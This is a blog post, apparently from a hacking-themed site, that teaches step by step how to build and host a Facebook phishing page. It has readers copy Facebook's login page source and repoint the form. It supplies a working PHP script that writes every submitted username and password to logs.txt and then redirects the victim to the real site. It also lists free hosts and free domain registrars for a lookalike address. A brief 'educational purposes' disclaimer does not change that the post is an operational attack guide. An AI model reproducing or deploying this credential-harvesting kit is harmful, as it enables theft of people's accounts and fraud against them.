Annonymous Teacher

Annonymous Teacher
Hack is not for Fun

Create Phishing website Part-1

 Today I’m going to show you how to create a Phishing page & How to performe Phishing Attack step by step full tutorial. So, do you know




What is phising page?

This tutorial is strictly for educational purposes, any bad intentional using of this content is illegal, post writer won't be responsible!



Phishing is a technique by which we create a similar web page(Phishing Page) to the original one. In this technique, we copy original website page code and do some changes to it. Then upload it to the hosting and access it from anywhere.



Here is the list of things that you will learn from this post :


🔸How to copy the code from the original website

🔸How to do some changes in this code

🔸How to make a php script

🔸How to upload it to the Hosting

and a lot more !!!



Umm!!! Interested to read further ?? I’m sure you will like this tutorial and you want this tutorial. 😛




How to copy the code from the original website :


Open a website of which Phishing page do you want then press ctrl+U to open its source code file. For ex:- I’m copying the code of Facebook.com and then I will make a facebook phishing page. Well, this is what which you want …Right!! 😛


So I’m copying the source code from Fcaebook.com by pressing ctrl+U. You can see here the source code from Facebook.com is shown here :



The only thing you have to do is to select all code and then copy this code by pressing ctrl+A and then ctrl+C and then open a notepad file and paste it there by pressing ctrl+V.


You can see here I pasted down the whole code from website to my notepad file.







Now we'll be doing some changes in this !


Now, you have to find this line by pressing ctrl+F and type this whole line there and press Enter.



action=”https://www.facebook.com/login.php?login_attempt=1&lwv=110″ method=”post”






Let’s do some changes, You can see the path of Facebook is shown here. Copy this whole path and replace it with login.php and also change the method from post to get. and save this notepad file with the name fb.html.







How to make a PHP script?


Do you know Php Language? Well, If you don’t know anything about Php Language then no problem but in the future, I recommend you to learn this language. So, I’m giving you a PHP code which will save the username password which is entered on our fb.html page. and it also saves different username and password to a new line. When the victim enters his username and password to it then this PHP script will redirect that user to the original Facebook page.


So, here’s the Php script


<?php

header(“Location: https://www.facebook.com”);

$handle = fopen(“logs.txt”, “a”);

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);





fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>



Just copy this script and paste it down to your notepad file and then save this file with a name hack.php


One more thing creates a blank notepad file with a logs.txt name on which victim’s usernames and password will save.


Now, you have three notepad files one is none.html and second is login.php and third is logs.txt. Just copy all files and save it to a new folder.



How to upload Facebook Phishing Page to the Hosting?


Let Understand what is Hosting and Domain. To open a website we must have a domain, hosting. So, Domain is the name of our website. For ex :- I have cybermateofficial.xyz This is my domain. and the location where this domain has parked this location is known as hosting.


Still Confused!! Let’s Understand with an Example, Whenever we open a new store then we have to decide two things


🔺Store Room's

🔻Land/ Room


Similarly, For opening a website we need Domain for a website which is unique. and the second one is the land which is hosting on the Internet. Hosting and Domain are paid and some websites also provide this hosting and domain at free of cost.


Here’s the list of Free hosting providers website:


🔸Bytehost

🔸000webhost

🔸freehostia

🔸5gbfree

And many more....




I’m using 000webhost here. So, open this website and do sign up there. In the field of a website, name leaves it blank.


and now you have to take a domain which looks similar to Facebook


I’m sharing some website link which provides free domains :


🔻Dot tk

🔺Freenom


You can use any of them to register a domain for free. Now, come to the hosting. You can use any of the websites. 


This post has already became much long, if you have read till this point thank you so much, will upload part two of this tomorrow where I would share how to attach domain and hosting, and moreover such things which nobody will tell you

No comments

Theme images by enot-poloskun. Powered by Blogger.